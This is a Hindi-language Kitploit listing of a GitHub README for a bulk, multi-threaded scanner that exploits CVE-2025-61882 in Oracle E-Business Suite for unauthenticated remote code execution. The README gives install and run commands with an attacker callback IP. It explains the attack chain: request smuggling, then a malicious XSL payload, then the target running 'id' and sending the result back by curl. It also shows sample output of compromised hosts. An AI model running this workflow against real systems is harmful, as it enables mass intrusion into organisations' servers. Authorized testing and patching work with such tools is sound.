Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-61882 — मल्टी-थ्रेडेड स्कैनर CVE-2025-61882 के लिए Oracle E-Business Suite में, HTTP रिक्वेस्ट स्मगलिंग का शोषण करके बिना प्रमाणीकरण के रिमोट कोड निष्पादन प्राप्त करता है और कमांड आउटपुट के माध्यम से सत्यापित करता है। | Kitploit
उपकरण/GitHubGitHub/sachinart/cve-2025-61882
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubsachinart/cve-2025-61882

CVE-2025-61882

मल्टी-थ्रेडेड स्कैनर CVE-2025-61882 के लिए Oracle E-Business Suite में, HTTP रिक्वेस्ट स्मगलिंग का शोषण करके बिना प्रमाणीकरण के रिमोट कोड निष्पादन प्राप्त करता है और कमांड आउटपुट के माध्यम से सत्यापित करता है।

रिपॉजिटरी देखें
11710 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Oracle E-Business Suite RCE स्कैनर (CVE-2025-61882)

Oracle E-Business Suite इंस्टॉलेशन में CVE-2025-61882 का पता लगाने के लिए एक तेज़, मल्टी-थ्रेडेड बल्क स्कैनर। यह गंभीर कमजोरी अनधिकृत रिमोट कोड निष्पादन की अनुमति देती है।

Python Version License CVE

🎯 विशेषताएं

  • बल्क स्कैनिंग - फ़ाइल से सैकड़ों या हजारों लक्ष्यों को प्रोसेस करें
  • मल्टी-थ्रेडेड - कॉन्फ़िगर करने योग्य समवर्ती स्कैनिंग (डिफ़ॉल्ट: 20 थ्रेड)
  • स्वचालित पहचान - id कमांड निष्पादित करके और आउटपुट पार्स करके RCE को मान्य करता है
  • रीयल-टाइम परिणाम - कमजोर लक्ष्य तुरंत vuln-output.txt में लिखे जाते हैं
  • रैंडम पोर्ट - संघर्षों से बचने के लिए प्रत्येक लक्ष्य के लिए रैंडम पोर्ट (2000-9999) का उपयोग करता है
  • स्वच्छ आउटपुट - न्यूनतम शोर के साथ प्रगति ट्रैकिंग

📋 आवश्यकताएं

root@kitploit:~
pip install requests

बस इतना ही। केवल Python 3.7+ और requests लाइब्रेरी।

🚀 इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt

💻 उपयोग

बेसिक स्कैन

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP

फास्ट स्कैन (50 थ्रेड)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50

कंज़र्वेटिव स्कैन (10 थ्रेड)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10

📝 लक्ष्य फ़ाइल प्रारूप

प्रत्येक पंक्ति में एक URL के साथ targets.txt फ़ाइल बनाएं:

root@kitploit:~
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com

📊 आउटपुट उदाहरण

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║   Oracle E-Business Suite RCE Scanner (CVE-2025-61882)       ║
╚═══════════════════════════════════════════════════════════════╝

[*] Loaded 1235 targets from file
[*] Running with 20 concurrent threads
[*] Vulnerable hosts will be saved to vuln-output.txt

[*] [1/1235] Checking https://target1.com:443 on port 7893
[*] [2/1235] Checking https://target2.com:443 on port 5882

[+] Got one! 129.146.56.43 is vulnerable
[+] Command output: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)

=================================================================
[*] Scan finished in 245.67 seconds
[*] Found 3 vulnerable target(s)
[*] Check vuln-output.txt for full results
=================================================================

[+] Vulnerable targets found:

    129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
    192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
    10.0.0.100 → uid=500(oracle) gid=500(oinstall)

📄 आउटपुट फ़ाइल

परिणाम vuln-output.txt में सहेजे जाते हैं:

root@kitploit:~
# Oracle EBS CVE-2025-61882 - Scan Results
# Started: Tue Oct 07 15:30:45 2025
# Total targets: 1235
# Scanner by: Chirag Artani

129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)

🔍 यह कैसे काम करता है

  1. CSRF टोकन प्राप्ति - लक्ष्य से एक वैध CSRF टोकन प्राप्त करता है
  2. HTTP रिक्वेस्ट स्मगलिंग - दुर्भावनापूर्ण पेलोड इंजेक्ट करने के लिए स्मगलिंग कमजोरी का शोषण करता है
  3. XSL पेलोड डिलीवरी - दुर्भावनापूर्ण XSL स्टाइलशीट प्रदान करता है जो कमांड निष्पादित करता है
  4. कॉलबैक सत्यापन - लक्ष्य id कमांड निष्पादित करता है और curl के माध्यम से आउटपुट वापस भेजता है
  5. रेगेक्स मिलान - uid=...gid=... पैटर्न की जांच करके सफल RCE को मान्य करता है

⚙️ कॉन्फ़िगरेशन

🔒 जिम्मेदार प्रकटीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण के लिए है। हमेशा:

  • ✅ परीक्षण से पहले लिखित अनुमति प्राप्त करें
  • ✅ केवल उन सिस्टम को स्कैन करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण है
  • ✅ निष्कर्षों को प्रभावित संगठनों को जिम्मेदारी से रिपोर्ट करें
  • ✅ समन्वित कमजोरी प्रकटीकरण प्रथाओं का पालन करें
  • ❌ अनधिकृत सिस्टम पर कभी उपयोग न करें

कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।

🐛 ज्ञात समस्याएं

  • फ़ायरवॉल/IDS ब्लॉकिंग के कारण कुछ लक्ष्य टाइमआउट हो सकते हैं
  • कॉलबैक पहचान के लिए लक्ष्य को रैंडम पोर्ट पर आपके VPS तक पहुंचने की आवश्यकता होती है
  • SSL प्रमाणपत्र चेतावनियां दबा दी जाती हैं (पेंटेस्टिंग के लिए अपेक्षित)

🤝 योगदान

कोई बग मिला? कोई फीचर अनुरोध है?

  1. रेपो को फोर्क करें
  2. अपनी फीचर ब्रांच बनाएं (git checkout -b feature/amazing-feature)
  3. अपने बदलाव कमिट करें (git commit -m 'Add some feature')
  4. ब्रांच पर पुश करें (git push origin feature/amazing-feature)
  5. पुल रिक्वेस्ट खोलें

📜 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

⚠️ अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। लेखक इस टूल के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। अपने जोखिम पर उपयोग करें।

📚 संदर्भ

  • CVE-2025-61882 विवरण
  • Oracle क्रिटिकल पैच अपडेट

👨‍💻 Chirag Artani द्वारा विकसित

वेबसाइट • ट्विटर • लिंक्डइन

इन्फोसेक समुदाय के लिए ❤️ के साथ बनाया गया

टूल डाउनलोड करें
तर्कआवश्यकडिफ़ॉल्टविवरण
--targetsहाँ-लक्ष्य URL वाली फ़ाइल का पथ
--lhostहाँ-आपका VPS/हमलावर IP पता
--threadsनहीं20समवर्ती थ्रेड की संख्या